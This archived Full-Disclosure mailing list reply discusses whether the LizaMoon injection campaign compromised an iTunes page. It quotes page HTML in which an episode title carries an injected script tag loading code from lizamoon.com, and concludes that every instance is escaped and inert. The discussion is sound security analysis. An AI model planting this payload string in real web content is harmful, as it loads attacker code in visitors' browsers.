lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-Id: <B237268C-8DB8-43C8-BB2F-1C6F909FAD53@gmail.com>
Date: Tue, 29 Mar 2011 07:58:49 -0700
From: Andrew Farmer <andfarm@...il.com>
To: matador matador <m4t4d00r@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: itunes.apple.com owned by webapp malicious
	host

On 2011-03-29, at 07:22, matador matador wrote:
> Enjoy! :)
> 
> http://www.google.com/search?q=lizamoon.com+site%3Aapple.com

At least on the page I'm looking at, all of the instances where that string appears seem to be escaped properly - e.g,

<tr parental-rating="1" rating-podcast="1" rating-riaa="0" role="row" metrics-loc="Track_" audio-preview-url="http://www.watfbc.org/files/030911W.mp3" preview-album="Women's Ministries" preview-artist="Suzanne Chambers" class="podcast-episode" preview-title="Sermon on the Mount Wk8&lt;/title&gt;&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;" adam-id="92027240" row-number="0">

<span><span class="badges"><a href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/parentalAdvisory"><span class="clean">Clean</span></a></span><span class="text">Sermon on the Mount Wk8&lt;/title&gt;&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;</span></span>

<div adam-id="92027240" class="track-inline-details-desc-popup-data-wrapper"><script type="text/javascript" "charset"="utf-8">var __desc_popup_d_92027240={"title":"Sermon on the Mount Wk8<\/title><script src=http://lizamoon.com/ur.php><\/script>", "desc_popup_additional_css_classes":"audio", "description":"", "release_date":"10 March 2011", "desc_popup_type":"podcast_episode_description_popup", "release_date_label":"Released"};</script></div>

None of them trigger a resource load in Chrome.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ